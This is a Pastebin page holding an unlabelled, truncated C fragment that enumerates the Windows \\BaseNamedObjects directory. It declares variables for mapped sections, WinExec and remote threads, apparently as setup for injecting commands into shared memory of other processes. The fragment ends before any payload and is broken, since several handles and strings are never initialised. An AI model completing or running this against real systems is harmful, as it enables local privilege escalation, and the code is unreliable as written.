API tools faq
paste
Advertisement
Guest User

Code

a guest
May 21st, 2014
1,048
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.05 KB | None | 0 0
raw download clone embed print report
  1. typedef struct _LSA_UNICODE_STRING {  
  2.     USHORT Length;  
  3.     USHORT MaximumLength;
  4.     PWSTR Buffer;
  5. } UNICODE_STRING;
  6.  
  7. typedef struct _OBJDIR_INFORMATION {
  8.   UNICODE_STRING          ObjectName;
  9.   UNICODE_STRING          ObjectTypeName;
  10.   BYTE                    Data[1];
  11. } OBJDIR_INFORMATION;
  12.  
  13. typedef struct _OBJECT_ATTRIBUTES {
  14.     ULONG Length;
  15.     HANDLE RootDirectory;
  16.     UNICODE_STRING *ObjectName;
  17.     ULONG Attributes;
  18.     PVOID SecurityDescriptor;        
  19.     PVOID SecurityQualityOfService;  
  20. } OBJECT_ATTRIBUTES;
  21.  
  22. #define InitializeObjectAttributes( p, n, a, r, s ) { \
  23.     (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
  24.     (p)->RootDirectory = r;                             \
  25.     (p)->Attributes = a;                                \
  26.     (p)->ObjectName = n;                                \
  27.     (p)->SecurityDescriptor = s;                        \
  28.     (p)->SecurityQualityOfService = NULL;               \
  29.     }
  30.             typedef DWORD (WINAPI* NTQUERYDIRECTORYOBJECT)( HANDLE, OBJDIR_INFORMATION*, DWORD, DWORD ,DWORD,DWORD*,DWORD* );
  31. NTQUERYDIRECTORYOBJECT NtQueryDirectoryObject;
  32.             typedef DWORD (WINAPI* NTOPENDIRECTORYOBJECT)( HANDLE *, DWORD,OBJECT_ATTRIBUTES* );
  33. NTOPENDIRECTORYOBJECT  NtOpenDirectoryObject;
  34.              typedef int (*MYPROC)(LPTSTR);
  35.  
  36.  
  37.  
  38.  OBJDIR_INFORMATION *ssinfo  =(OBJDIR_INFORMATION* ) HeapAlloc(GetProcessHeap(), 0, 0x800);
  39.            ///////////////////////
  40.             HANDLE hFile,hThread,hMapFile;
  41.   HMODULE hNtdll ,hKernel;
  42.   DWORD dwThreadId;
  43.   OBJECT_ATTRIBUTES obj;
  44.   WCHAR  * uString=L"\\BaseNamedObjects";
  45.   UNICODE_STRING str;
  46.   DWORD i,a,iStrLen,b=0;
  47.   char sObjName[30],sTmp[50];
  48.   LPVOID lpMapAddress;
  49.   FARPROC pWinExec,pExitThread;
  50.   bool bFound;
  51.   char* sCommand;
  52.             /////////////////////////////////////////////////////////////////
  53.             NtQueryDirectoryObject = (NTQUERYDIRECTORYOBJECT )GetProcAddress(hinstLib,"NtQueryDirectoryObject");
  54.             InitializeObjectAttributes (&obj, &str, 0, 0, 00);
  55.             NtOpenDirectoryObject(&hFile,0x20001,&obj);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!